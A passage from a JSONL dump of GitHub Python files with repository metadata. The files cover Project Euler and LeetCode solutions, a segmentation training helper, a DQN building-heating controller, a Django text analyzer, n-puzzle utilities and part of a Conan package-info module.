10\r\n\t\tnum = int(((math.pow(10, count - 1)) * rem)+ div )\r\n\r\n\t\t# If all the permutations are checked \r\n\t\t# and we obtain original number exit \r\n\t\t# from loop. 
\r\n\t\tif (num == N) : \r\n\t\t\treturn True\r\n\t\r\n\treturn False\r\n\t\r\n# Driver Program \r\nN = primeNumbers(1,100)\r\ncount = 0\r\nfor i in N :\r\n if (checkCircular(i)) : \r\n count += 1\r\nprint (count)\r\n# This code is contributed by Nikita Tiwari \r\n\"\"\"","repo_name":"SanjayPJ/ProjectEuler","sub_path":"Project Euler/Circular Primes NC.py","file_name":"Circular Primes NC.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31467449877","text":"def divide(a, b, n):\n assert a > 0 and b > 0\n if a > n:\n gcdv, x, y = xgcd(a, n)\n else:\n gcdv, x, y = xgcd(n, a)\n assert gcdv == 1\n\n return (b * y) % n\n\n\ndef xgcd(a, b):\n x0, x1, y0, y1 = 1, 0, 0, 1\n while b != 0:\n q, a, b = a // b, b, a % b\n x0, x1 = x1, x0 - q * x1\n y0, y1 = y1, y0 - q * y1\n return a, x0, y0\n","repo_name":"Arkioner/CourseraWhatIsAProof","sub_path":"src/Modular/ModularDivision/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6151620470","text":"import sklearn\nimport torch\nimport torchvision\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.style.use('ggplot')\n\nimport os\nroot = os.path.dirname(os.path.join(\n 'havingfun/detection/segmentation/saved_imgs/'\n ))\n\nimport numpy as np\nimport sklearn.metrics as metrics\n\nmodelname = 'Lightunet18_MSE_SGD'\nlr = '8.59e2'\nepochs = 'e10'\nprocess_model_param = 'process_' + modelname + '_' + lr + '_' + epochs + '.pth'\nmodel_param = modelname + '_' + lr + '_' + epochs + '.pth'\nloss_imgs = 'Loss_'+ modelname + '_' + lr + '_' + epochs +'.png'\nacc_imgs = 'Acc_' + modelname + '_' + lr + '_' + epochs +'.png'\nshow_imgs = 'Show_' + modelname + '_' + lr + '_' + epochs +'.png'\n\n# save the model\ndef save_model(epochs, model, optimizer, criterion):\n torch.save({\n 'epoch': epochs,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': criterion,\n }, os.path.join(root,process_model_param))\n\ndef save_entire_model(epochs, model, optimizer, criterion):\n torch.save({\n 'epoch': epochs,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': criterion,\n }, os.path.join(root, model_param))\n\ndef load_model(checkpoint, model):\n print('======> Loading checkpoint')\n model.load_state_dict(checkpoint['model_state_dict'])\n\n# compute accuracy\n# segmentation codes\ncodes = ['Target', 'Void']\nnum_classes = 2\nname2id = {v:k for k, v in enumerate(codes)}\nvoid_code = name2id['Void']\n \ndef save_predictions_as_imgs(loader, model, folder = root, device = 'cuda'):\n print('===========> saving prediction')\n for idx, (x, y) in enumerate(loader):\n x = x.to(device = device)\n with torch.no_grad():\n preds = torch.sigmoid(model(x))\n preds = (preds > 0.5).float()\n torchvision.utils.save_image(\n preds, \n os.path.join(root, 'seg_result.png'),\n )\n torchvision.utils.save_image(\n y.unsqueeze(1), f'{folder}{idx}.png')\n\n model.train()\n\ndef save_plots(train_acc, val_acc, train_loss, val_loss):\n print(f'====> Saving processing ratios')\n plt.figure(figsize = (10, 7))\n plt.plot(\n train_acc, color = 'green', linestyle = '-', label = 'Train accuracy'\n )\n plt.plot(\n val_acc, color = 'blue', linestyle = '-', label = 'Validation accuracy'\n )\n plt.xlabel('Epochs')\n plt.ylabel('Segmentation Accuracy')\n plt.legend()\n 
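# (Editor's aside on the Project Euler record above, which its author marks
# "not completed": checkCircular returns after testing a single rotation.)
# A minimal self-contained sketch of one way to count circular primes --
# the helper names below are illustrative, not the author's:
def _is_prime(n):
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True

def _is_circular_prime(n):
    s = str(n)
    # every digit rotation of n must itself be prime
    return all(_is_prime(int(s[i:] + s[:i])) for i in range(len(s)))

# sanity check against the problem statement: thirteen circular primes below 100
assert sum(_is_circular_prime(n) for n in range(2, 100)) == 13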
plt.savefig(os.path.join(root, acc_imgs))\n\n plt.figure(figsize = (10, 7))\n plt.plot(\n train_loss, color = 'orange', linestyle = '-', label = 'Train loss'\n )\n plt.plot(\n val_loss, color = 'red', linestyle = '-', label = 'Validation loss'\n )\n plt.xlabel('Epochs')\n plt.ylabel('Segmentation Loss')\n plt.legend()\n \n plt.savefig(os.path.join(root, loss_imgs))\n\ndef plot_img_and_mask(img, pred, mask):\n print('=====> Saving prediction result')\n fig, ax = plt.subplots(3, 1)\n # plt.grid = False \n # plt.xticks([]), plt.yticks([])\n\n fig = plt.figure()\n fig.set_size_inches(50,20)\n ax1 = fig.add_subplot(131)\n ax1.grid(False)\n ax1.set_title('Input Image')\n ax1.imshow(img)\n\n ax2 = fig.add_subplot(132)\n ax2.grid(False)\n ax2.set_title('Output Prediction')\n ax2.imshow(pred)\n \n ax3 = fig.add_subplot(133)\n ax3.grid(False)\n ax3.set_title('Target Mask')\n ax3.imshow(mask)\n\n plt.savefig(os.path.join(root, show_imgs))\n\n# if __name__ == '__main__':\n # save_model()\n # load_model()\n # save_model()\n # check_accuracy()\n # save_predictions_as_imgs()\n # save_plots()\n ","repo_name":"lee-shun/forest_fire_detection_system","sub_path":"scripts/develop/detection_part/segmentation/lightunet18/lightutils.py","file_name":"lightutils.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"16486269647","text":"import numpy as np;import pandas as pd\nfrom DQN_Agent_test import DQN_Agent\nfrom pathlib import Path\nimport sys\nsys.path.insert(0, str(Path(__file__).parent.absolute().parent.parent.parent / 'interfaces' / 'openai-gym'))\nfrom boptestGymEnv import BoptestGymEnv\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef plot(zonetemp, heatingcoil, Historian, axes, plotutils):\n\n time_hours = [time / 3600 for time in Historian[\"time\"]]\n axes[0].cla()\n axes[1].cla()\n axes[0].set_title('Zone temperature', fontweight='bold')\n axes[0].set_ylim(15, 27)\n axes[0].set_xlim(0, plotutils['length'] / 3600)\n axes[0].set_xticks(range(0, int(plotutils['length'] / 3600) + 6, 6))\n axes[0].set_ylabel('Temperature [C]')\n axes[0].set_yticks([i for i in range(15, 28)])\n axes[0].grid(which='both', linewidth=0.5, color='white')\n axes[0].set_facecolor(\"gainsboro\")\n\n axes[1].set_title('Heating coil power demand (thermal)', fontweight='bold')\n axes[1].set_ylim(0, 15000)\n axes[1].set_xlim(0, plotutils['length'] / 3600)\n axes[1].set_xticks(range(0, int(plotutils['length'] / 3600) + 6, 6))\n axes[1].set_ylabel('Watts [W]')\n axes[1].set_xlabel('Time [hours]')\n axes[1].set_yticks([i for i in range(0, 16000, 1000)])\n axes[1].grid(which='both', linewidth=0.5, color='white')\n axes[1].set_facecolor(\"gainsboro\")\n\n axes[0].plot(plotutils['time'], plotutils['lostp'], color='red', ls='--', label='Setpoints')\n axes[0].plot(plotutils['time'], plotutils['histp'], color='red', ls='--')\n axes[0].plot(time_hours, zonetemp, label='Zone temperature')\n axes[1].plot(time_hours, heatingcoil)\n axes[0].legend(loc='upper right')\n plt.tight_layout()\n plt.draw()\n plt.pause(0.5)\n\n# --------------------\n# Set parameters for initializing the gym environment\n\nstep = 300\nepisode_length = 3600*1*24 # Set the simulation length in seconds\nday_no = 3 #np.random.choice([1,2,4,5,8,9,10,11,12,15,16,17,18])\nstart_time=24*3600*day_no # Specify the start time of the simulation\nactions = ['PSZACcontroller_oveHeaPer1_u'] # Specify which control actions to actuate by specifying the keys\nkpi_zones = [\"1\"] # 
Select which zone KPI to be included in the reward function\n\n''' Form the Observation States '''\nbuilding_obs = ['senTemRoom1_y','senHouDec_y'] # Specify which building sensor states to return as observation States\nforecast_obs = {'TDryBul':[0],'HGloHor':[0]} # Specify which exogenous states to return as observation States - 0: index means current, 1: index means forecasted state 1 hour ahead\n\n# Set the weights for the different KPIs to form the reward function\nKPI_rewards = {\n \"ener_tot\": {\"hyper\": -120, \"power\": 1},\n \"tdis_tot\": {\"hyper\": -160, \"power\": 1},\n \"idis_tot\": {\"hyper\": 0, \"power\": 1},\n \"cost_tot\": {\"hyper\": 0, \"power\": 1},\n \"emis_tot\": {\"hyper\": 0, \"power\": 1},\n \"power_pen\":{\"hyper\": 0, \"power\": 1}} # mainly used for DR power penalty\n# --------------------\n\n\n# Initiliaze the environment\nenv = BoptestGymEnv(episode_length=episode_length,\n testcase='spawnrefsmalloffice',\n Ts=step,\n start_time=start_time,\n actions=actions,\n building_obs=building_obs,\n forecast_obs=forecast_obs,\n kpi_zones= kpi_zones,\n password = 'dbuass642yo', # put your own password\n lower_obs_bounds=[273.15+15, 0, -12, 0], # manually set the lower bounds for observation\n upper_obs_bounds=[273.15+27, 24, 5, 195.8], # manually set the upper bounds for observation\n KPI_rewards=KPI_rewards,\n n_obs = True) # if set to True returns a normalized state vector between 0-1\n\nkpi_list = ['ener_tot', 'tdis_tot', 'idis_tot', 'cost_tot', 'emis_tot']\nstate_size = env.observation_space.shape[0]\n\nprint (\"State_size :{}\".format(state_size))\n\nepisodes= 1\nlast_ep= 120\n\nAgent_1 = DQN_Agent(state_size, 5)\n\n\n# RUN TEST CASE -\n# -------------\n\n\nHistorian = {key: [] for key in ['time', 'states', 'rewards', 'episodes', 'action_1','senTemOA_y','day_no',\n 'senTRoom_y','senTRoom1_y','senTRoom2_y','senTRoom3_y','senTRoom4_y',\n 'Total_Pow_Dem_0','Total_Pow_Dem_1','Total_Pow_Dem_2','Total_Pow_Dem_3','Total_Pow_Dem_4',\n 'Heating_Pow_Dem_0','Heating_Pow_Dem_1','Heating_Pow_Dem_2','Heating_Pow_Dem_3','Heating_Pow_Dem_4',\n 'Cooling_Pow_Dem_0','Cooling_Pow_Dem_1','Cooling_Pow_Dem_2','Cooling_Pow_Dem_3','Cooling_Pow_Dem_4',\n 'Zone_1_HC_Action']}\n#'Damper_0','Damper_1','Damper_2','Damper_3','Damper_4'\nKPI_hist = {key: [] for key in kpi_list}\nKPI_hist['episodes'] = []\nKPI_hist['scores'] = []\nKPI_hist['day_no'] = []\n# --------------------\n\n# loading previous memory buffer\nif last_ep == 0:\n mem_list_1 = []\nelse:\n mem_list_1 = pd.read_csv(\"RL_Data_test/04_Mem/mem_data_\" + str(last_ep) + \".csv\", dtype=object)\n mem_list_1.drop(mem_list_1.columns[0], axis=1, inplace=True)\n mem_list_1['Action'] = mem_list_1['Action'].astype('float')\n mem_list_1['Reward'] = mem_list_1['Reward'].astype('float')\n mem_list_1['States'] = mem_list_1['States'].map(\n lambda x: \" \".join((x.strip('[').strip(']').replace(\"\\n\", \"\")).split()))\n mem_list_1['States'] = mem_list_1['States'].map(\n lambda x: np.reshape(np.array(x.split(' '), dtype=np.float32), (1, -1)))\n mem_list_1['Next_State'] = mem_list_1['Next_State'].map(\n lambda x: \" \".join((x.strip('[').strip(']').replace(\"\\n\", \"\")).split()))\n mem_list_1['Next_State'] = mem_list_1['Next_State'].map(\n lambda x: np.reshape(np.array(x.split(' '), dtype=np.float32), (1, -1)))\n\n for i in range(len(mem_list_1)):\n state_m1 = mem_list_1.iloc[i][0];\n action_m1 = mem_list_1.iloc[i][1]\n reward_m1 = mem_list_1.iloc[i][2];\n next_state_m1 = mem_list_1.iloc[i][3];\n done_m1 = mem_list_1.iloc[i][4]\n 
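# (Editor's aside) The CSV round-trip above re-parses numpy arrays out of
# their string repr, which is fragile. A hedged alternative sketch --
# assuming the replay memory is an iterable of
# (state, action, reward, next_state, done) tuples as appended below;
# save_memory/load_memory are illustrative names, not part of the agent API:
import pickle

def save_memory(memory, path):
    # pickle round-trips numpy arrays exactly, with no string parsing
    with open(path, "wb") as f:
        pickle.dump(list(memory), f)

def load_memory(path):
    with open(path, "rb") as f:
        return pickle.load(f)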
Agent_1.append_sample(state_m1, action_m1, reward_m1, next_state_m1, done_m1)\n\nprint (\"Loading Weights\")\nAgent_1.model_load_weights(\"RL_Data_test/02_NN/DQN_\" + str(last_ep) + \".h5\") # From 2nd episode\n\n\nprint('\\n Starting Simulation...')\nplotutils = dict(time = [i / 3600 for i in range(0, int(episode_length) + step, step)],\n lostp = [21 if 6 <= i / 3600 <= 20 else 15.6 for i in range(0, int(episode_length) + step, step)],\n histp = [24 if 6 <= i / 3600 <= 20 else 26.7 for i in range(0, int(episode_length) + step, step)],\n length = episode_length)\nzonetemp = []\nheatingcoil = []\nfig, axes = plt.subplots(2, 1, figsize=(10,10))\nplt.ion()\nplt.show()\n\n# Simulation Loop\nfor e in range(last_ep,last_ep+episodes):\n\n day_no = np.random.choice([10,11,12,15,16,17,18,19,22,23,24,25,26])\n start_time = 24 * 3600 * day_no\n env = BoptestGymEnv(episode_length=episode_length,\n testcase='spawnrefsmalloffice',\n Ts=step,\n start_time=start_time,\n actions=actions,\n building_obs=building_obs,\n forecast_obs=forecast_obs,\n kpi_zones=kpi_zones,\n password='dbuass642yo', # put your own password\n lower_obs_bounds=[273.15 + 15, 0, -12, 0], # manually set the lower bounds for observation\n upper_obs_bounds=[273.15 + 27, 24, 5, 195.8], # manually set the upper bounds for observation\n KPI_rewards=KPI_rewards,\n n_obs=True) # if set to True returns a normalized state vector between 0-1\n\n print (\"loading weights\")\n Agent_1.model_load_weights(\"RL_Data_test/02_NN/DQN_\" + str(e) + \".h5\") # From 2nd episode\n Agent_1.update_target_model()\n score = 0\n e = e + 1\n print('\\nRunning controller script...')\n state = env.reset() # check if the reset function resets the weights as well\n\n\n\n print (\"State\")\n print (state)\n\n print(\"Modified State\")\n print(state)\n\n state = np.reshape(state, [1, state_size]) \n counter = 0\n\n for i in range(int(episode_length/step)):\n print(\"Day:{}\".format(day_no))\n print(\"episode\")\n print(e)\n print(\"Time Step\")\n print(step) \n\n print(\"Agent Memory\")\n print(len(Agent_1.memory))\n counter= counter + 1\n\n abs_time = i * step\n minutes = ((abs_time) % 3600) / 60\n days = math.floor(abs_time / (3600 * 24))\n\n building_states = env.get_building_states() # returns a dictionary of all the current states of the building sensors\n hou_min = building_states['senHouDec_y']\n\n\n print('Days: {}, Hours: {} , Minutes: {}'.format(days,hou_min, minutes))\n raw_action_u1 = Agent_1.get_action(state)\n q_1 = Agent_1.target_predict_qvalue(state)\n\n # if hou_min <= 5.0:\n # raw_action_u1 = 0\n #\n # if hou_min > 22.1:\n # raw_action_u1 = 0\n\n print(\"Raw Action\")\n print(raw_action_u1)\n\n action_proc= [0,0.05,0.15,0.25,0.45]\n\n\n processed_act = [action_proc[raw_action_u1]]\n\n print()\n print(\"Heating Coil Action\")\n print(processed_act)\n\n print(\"Q-values_1\")\n print(q_1)\n\n next_state, reward, done, info = env.step(processed_act)\n score += reward\n\n next_state = np.reshape(next_state, [1, state_size])\n building_states = env.get_building_states()\n\n if counter % (12) == 0:\n Agent_1.train_model()\n\n if counter % (12 * 4) == 0:\n Agent_1.update_target_model()\n\n weather_states = env.get_weather_forecast()\n\n print (\"Dry bulb temp: {}\".format(weather_states['TDryBul'][0]))\n\n # Get Power\n print(\"Total Power; Zone 0:{}, Zone 1:{}, Zone 2: {}, Zone 3: {}, Zone 4; {}\".format(\n round(building_states['senPowCor_y'], 2),\n round(building_states['senPowPer1_y'], 2),\n round(building_states['senPowPer2_y'], 2),\n 
round(building_states['senPowPer3_y'], 2),\n round(building_states['senPowPer4_y'], 2)))\n\n \n print()\n\n # Append samples\n Agent_1.append_sample(state, raw_action_u1, reward, next_state, done)\n\n if last_ep == 0:\n mem_list_1.append((state, raw_action_u1, reward, next_state, done)) # 1st episode\n else:\n mem_list_1 = mem_list_1.append(\n {'States': state, 'Action': raw_action_u1, 'Reward': reward, 'Next_State': next_state, 'Done': done},\n ignore_index=True)\n\n state = next_state\n\n print('Days: {}, Hours: {} , Minutes: {}'.format(days, hou_min, minutes))\n print(next_state, reward, done, info)\n\n print(\"Room Temperature; Zone 0: {}, Zone 1: {}, Zone 2: {}, Zone 3: {}, Zone 4: {}, OA Temp: {}\".format(\n building_states['senTemRoom_y'],\n building_states['senTemRoom1_y'],\n building_states['senTemRoom2_y'],\n building_states['senTemRoom3_y'],\n building_states['senTemRoom4_y'],\n building_states['senTemOA_y']))\n\n\n print(\"Exploration\")\n print (Agent_1.exploration_value())\n\n u=env.get_input_hist()\n\n print(\"Score\")\n print(score)\n\n print(\"\\n\")\n\n # Store Data\n Historian[\"time\"].append(i * step)\n Historian[\"states\"].append(state[0])\n Historian[\"episodes\"].append(e)\n Historian[\"rewards\"].append(reward)\n Historian[\"action_1\"].append(processed_act[0])\n Historian['senTemOA_y'].append(building_states['senTemOA_y'])\n Historian['day_no'].append(day_no)\n\n Historian[\"senTRoom_y\"].append(building_states['senTemRoom_y'])\n Historian[\"senTRoom1_y\"].append(building_states['senTemRoom1_y'])\n Historian['senTRoom2_y'].append(building_states['senTemRoom2_y'])\n Historian['senTRoom3_y'].append(building_states['senTemRoom3_y'])\n Historian['senTRoom4_y'].append(building_states['senTemRoom4_y'])\n\n Historian[\"Total_Pow_Dem_0\"].append(building_states['senPowCor_y'])\n Historian[\"Total_Pow_Dem_1\"].append(building_states['senPowPer1_y'])\n Historian[\"Total_Pow_Dem_2\"].append(building_states['senPowPer2_y'])\n Historian[\"Total_Pow_Dem_3\"].append(building_states['senPowPer3_y'])\n Historian[\"Total_Pow_Dem_4\"].append(building_states['senPowPer4_y'])\n\n Historian[\"Heating_Pow_Dem_0\"].append(building_states['senHeaPow_y'])\n Historian[\"Heating_Pow_Dem_1\"].append(building_states['senHeaPow1_y'])\n Historian[\"Heating_Pow_Dem_2\"].append(building_states['senHeaPow2_y'])\n Historian[\"Heating_Pow_Dem_3\"].append(building_states['senHeaPow3_y'])\n Historian[\"Heating_Pow_Dem_4\"].append(building_states['senHeaPow4_y'])\n\n Historian[\"Cooling_Pow_Dem_0\"].append(building_states['senCCPow_y'])\n Historian[\"Cooling_Pow_Dem_1\"].append(building_states['senCCPow1_y'])\n Historian[\"Cooling_Pow_Dem_2\"].append(building_states['senCCPow2_y'])\n Historian[\"Cooling_Pow_Dem_3\"].append(building_states['senCCPow3_y'])\n Historian[\"Cooling_Pow_Dem_4\"].append(building_states['senCCPow4_y'])\n\n Historian[\"Zone_1_HC_Action\"].append(u['PSZACcontroller_oveHeaPer1_u'])\n\n # Historian['Damper_0'].append(u['PSZACcontroller_oveDamCor_u'])\n # Historian['Damper_1'].append(u['PSZACcontroller_oveDamP1_u'])\n # Historian['Damper_2'].append(u['PSZACcontroller_oveDamP2_u'])\n # Historian['Damper_3'].append(u['PSZACcontroller_oveDamP3_u'])\n # Historian['Damper_4'].append(u['PSZACcontroller_oveDamP4_u'])\n zonetemp.extend([building_states['senTemRoom1_y'] - 273.15])\n heatingcoil.extend([building_states['senPowPer1_y']])\n plot(zonetemp, heatingcoil, Historian, axes, plotutils)\n\n\n # Print KPIs\n kpi = (env.get_KPIs())\n\n for kpi_name in kpi_list:\n 
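# (Editor's note) One KPI snapshot is appended per finished episode; the
# matching episode/score/day_no rows are added next and the whole history is
# flushed to CSV every episode, so a crash loses at most the current run.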
KPI_hist[kpi_name].append(kpi[kpi_name])\n KPI_hist['episodes'].append(e)\n KPI_hist['scores'].append(score)\n KPI_hist['day_no'].append(day_no)\n print(\"Agent Memory : {}\".format(len(Agent_1.memory)))\n\n KPI_df = pd.DataFrame.from_dict(KPI_hist)\n KPI_df.to_csv(\"RL_Data_test/01_KPI/dr_KPI_v2_\" + str(e) + \".csv\")\n\n df_m_1 = pd.DataFrame(mem_list_1, columns=['States', 'Action', 'Reward', 'Next_State', 'Done'])\n df_m_1.to_csv(\"RL_Data_test/04_Mem/mem_data_\" + str(e) + \".csv\")\n\n Historian_df = pd.DataFrame.from_dict(Historian)\n Historian_df.to_csv(\"RL_Data_test/dr_data_test_v2_\" + str(e) + \".csv\")\n Agent_1.model_save_weights(\"RL_Data_test/02_NN/DQN_\" + str(e) + \".h5\")\n\n env.print_KPIs()\n\n\n\n\n\n\nprint('\\nTest case complete.')\n# --------------------\n# Get result data\n\n\n\n\n\n","repo_name":"henze-research-group/MODRLC","sub_path":"examples/python/RLC-spawnrefsmalloffice/DQN_Test_run.py","file_name":"DQN_Test_run.py","file_ext":"py","file_size_in_byte":15067,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"29502967086","text":"# Reorder LinkedLists in Python\n# Author: Pavan kumar Paluri\n# LeetCode-Medium \n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reorderList(self, head: ListNode) -> None:\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n # 3 stage algorithm:\n # stage -1 : Find the mid-point in the linkedlist\n # Stage-2: Reverse the second half of the linkedlist\n # Stage-3: Merge the first half and the reversed second half such that the odd elements are occupied by the first half and even elements are occupied by the second half\n \n # base condition:\n if head is None:\n return \n # Stage-1:\n fast, slow = head, head\n while fast.next is not None:\n fast = fast.next \n if fast.next is not None:\n slow = slow.next\n fast = fast.next\n # If here: slow exactly at mid-pt and fast is at end of list\n # Stage-2:\n current = slow.next \n prev = None \n slow.next = None\n while current is not None:\n tmp = current.next\n current.next = prev\n prev = current \n current = tmp\n # Stage-3:\n head1, head2 = head, prev\n while head2 is not None:\n tmpp = head1.next\n head1.next = head2\n head1 = head2\n head2 = tmpp \n \n","repo_name":"pvpk1994/Leetcode_Medium","sub_path":"Python/LinkedLists/Reordering.py","file_name":"Reordering.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39241512151","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef index(request):\n return render(request,'index.html')\n\ndef analyze(request):\n djtxt = request.POST.get('text', 'default')\n removepunc = request.POST.get('removepunc', 'off')\n fullcaps = request.POST.get('fullcaps', 'off')\n newlineremover = request.POST.get('linerem', 'off')\n charCounter = request.POST.get('count', 'off')\n params = {}\n\n if djtxt is None :\n return HttpResponse('Please enter some text.')\n\n else :\n if removepunc == \"on\" :\n punc = '''!@#$%^&*()_+-=[]\\;',./{}|:\"<>?'''\n analyzed = \"\"\n removed_Punctuations = \"\"\n for char in djtxt:\n if char not in punc:\n analyzed = analyzed + char\n else:\n removed_Punctuations = removed_Punctuations + char \n \n params = {'purpose': removed_Punctuations, 'analyzed_text': analyzed}\n djtxt = analyzed\n \n if 
fullcaps==\"on\":\n analyzed = \"\"\n for char in djtxt:\n analyzed = analyzed + char.upper()\n params = {'purpose': 'Changes to uppercase', 'analyzed_text': analyzed}\n djtxt = analyzed\n \n if newlineremover==\"on\":\n analyzed = \"\"\n for char in djtxt:\n if char !=\"\\n\" and char!=\"\\r\" :\n analyzed = analyzed + char\n params = {'purpose': 'Removed New Lines', 'analyzed_text': analyzed}\n djtxt = analyzed\n \n if charCounter==\"on\":\n analyzed = len(djtxt)\n params = {'purpose': 'Counting total characters...', 'analyzed_text': analyzed}\n djtxt = analyzed\n \n\n return render(request, 'analyze.html', params) \n\n if (removepunc!=\"on\" and fullcaps!=\"on\" and newlineremover!=\"on\" and charCounter!=\"on\") :\n return HttpResponse('Please select any operations.')","repo_name":"Arnab-png/Django","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16113680389","text":"import numpy\nimport re\n\n\ndef basic_check(npuzzle, size):\n if npuzzle.shape != (size, size):\n raise Exception('Not valid npuzzle, map error')\n\n unique_elements = set()\n\n for el in npuzzle:\n unique_elements = unique_elements.union(set(el))\n\n if len(unique_elements) != size * size:\n raise Exception('Not valid npuzzle, map error, dublicate elements')\n\n final_set = {elem for elem in range(size * size)}\n\n if final_set.intersection(unique_elements) != final_set:\n raise Exception('Not valid npuzzle, map error')\n\n\ndef make_arguments(parser):\n parser.add_argument('-H', '--heuristics', choices=['M', 'DH', 'H', 'E', 'D', 'A'], default='M',\n dest='heuristics',\n help='''Select heuristics to solve.\n M - for Manhattan distance.\n DH - for Diagonal distance + Hemming distance.\n E - for Euclidean distance.\n D - for Diagonal distance.\n A - for all above.\n Default value is M''')\n parser.add_argument(\"-s\", \"--solvable\", action=\"store_true\", default=False,\n help=\"Generates solvable puzzle. Not to use with -u.\")\n parser.add_argument(\"-u\", \"--unsolvable\", action=\"store_true\", default=False,\n help=\"Generates unsolvable\")\n parser.add_argument(\"-i\", \"--iterations\", type=int, default=10000, help=\"Passes number\")\n\n parser.add_argument('-f', '--file', default='', type=str, help='filepath to puzzle textfile')\n\n parser.add_argument('-g', '--greedy', action='store_true', help='''Greedy one. 
Not to use\n with -uc''', dest='greedy')\n\n parser.add_argument('-uc', '--uniformcost', action='store_true', help='''Uniform-cost search\n ''', dest='uniformcost')\n parser.add_argument(\"-size\", type=int, help=\"Map size, >= 3\", default=3, dest='size')\n\n parser.add_argument('-q', '--queuesize', type=int, default=100, help='''Set size''', dest='queue_size')\n args = parser.parse_args()\n\n return args\n\n\ndef list_to_string(list_map, size):\n space = len(str(size * size))\n str_map = ''\n for coord_y in range(size):\n for coord_x in range(size):\n str_map += str(list_map[coord_y * size + coord_x]).rjust(space) + ' '\n str_map += '\\n'\n return str_map\n\n\ndef str_to_numpy_array(string_map, size):\n start_map = list()\n lines = string_map.strip().split('\\n')\n\n for line in lines:\n row = re.findall(r'\\d+', line)\n row = [int(digit) for digit in row]\n start_map.append(row)\n\n npuzzle = numpy.array(start_map)\n\n if npuzzle.shape != (size, size):\n raise Exception('Not valid npuzzle, map error')\n\n return npuzzle\n\n\ndef str_from_file_to_numpy_array(args):\n start_map = list()\n size = args.size\n filename = args.file\n\n try:\n with open(filename, 'r') as lines:\n for line in lines:\n row = re.findall(r'\\d+', line)\n row = [int(digit) for digit in row]\n start_map.append(row)\n npuzzle = numpy.array(start_map)\n\n except Exception:\n raise Exception('Not valid path to file')\n\n basic_check(npuzzle, size)\n\n return npuzzle\n\n\ndef is_solvable(npuzzle_map_numpy, size):\n inv = 0\n size_not_even = size % 2 != 0\n # Make an array from map\n array_map = npuzzle_map_numpy.flatten()\n\n for i, puzzle in enumerate(array_map):\n for elem in array_map[:i]:\n if not puzzle:\n break\n if elem > puzzle:\n inv += 1\n\n is_inv_even = inv % 2 == 0\n\n if size_not_even:\n return not is_inv_even\n if 0 in npuzzle_map_numpy[::-2]:\n return is_inv_even\n elif 0 in npuzzle_map_numpy[::2]:\n return not is_inv_even\n return False\n\n","repo_name":"opogiba/npuzzle","sub_path":"uttils.py","file_name":"uttils.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31841814535","text":"import copy\nimport json\nimport os\nfrom collections import OrderedDict, defaultdict\n\nfrom conan.api.output import ConanOutput\nfrom conans.errors import ConanException\nfrom conans.util.files import load, save\n\n_DIRS_VAR_NAMES = [\"_includedirs\", \"_srcdirs\", \"_libdirs\", \"_resdirs\", \"_bindirs\", \"_builddirs\",\n \"_frameworkdirs\", \"_objects\"]\n_FIELD_VAR_NAMES = [\"_system_libs\", \"_frameworks\", \"_libs\", \"_defines\", \"_cflags\", \"_cxxflags\",\n \"_sharedlinkflags\", \"_exelinkflags\"]\n_ALL_NAMES = _DIRS_VAR_NAMES + _FIELD_VAR_NAMES\n\n\nclass MockInfoProperty:\n \"\"\"\n # TODO: Remove in 2.X\n to mock user_info and env_info\n \"\"\"\n counter = {}\n package = None\n\n def __init__(self, name):\n self._name = name\n\n @staticmethod\n def message():\n if not MockInfoProperty.counter:\n return\n ConanOutput().warning(\"Usage of deprecated Conan 1.X features that will be removed in \"\n \"Conan 2.X:\", warn_tag=\"deprecated\")\n for k, v in MockInfoProperty.counter.items():\n ConanOutput().warning(f\" '{k}' used in: {', '.join(v)}\", warn_tag=\"deprecated\")\n MockInfoProperty.counter = {}\n\n def __getitem__(self, key):\n MockInfoProperty.counter.setdefault(self._name, set()).add(self.package)\n return []\n\n def __setitem__(self, key, value):\n MockInfoProperty.counter.setdefault(self._name, 
set()).add(self.package)\n\n def __getattr__(self, attr):\n MockInfoProperty.counter.setdefault(self._name, set()).add(self.package)\n return []\n\n def __setattr__(self, attr, value):\n if attr != \"_name\":\n MockInfoProperty.counter.setdefault(self._name, set()).add(self.package)\n return super(MockInfoProperty, self).__setattr__(attr, value)\n\n\nclass _Component:\n\n def __init__(self, set_defaults=False):\n # ###### PROPERTIES\n self._properties = None\n\n # ###### DIRECTORIES\n self._includedirs = None # Ordered list of include paths\n self._srcdirs = None # Ordered list of source paths\n self._libdirs = None # Directories to find libraries\n self._resdirs = None # Directories to find resources, data, etc\n self._bindirs = None # Directories to find executables and shared libs\n self._builddirs = None\n self._frameworkdirs = None\n\n # ##### FIELDS\n self._system_libs = None # Ordered list of system libraries\n self._frameworks = None # Macos .framework\n self._libs = None # The libs to link against\n self._defines = None # preprocessor definitions\n self._cflags = None # pure C flags\n self._cxxflags = None # C++ compilation flags\n self._sharedlinkflags = None # linker flags\n self._exelinkflags = None # linker flags\n self._objects = None # linker flags\n\n self._sysroot = None\n self._requires = None\n\n # LEGACY 1.X fields, can be removed in 2.X\n self.names = 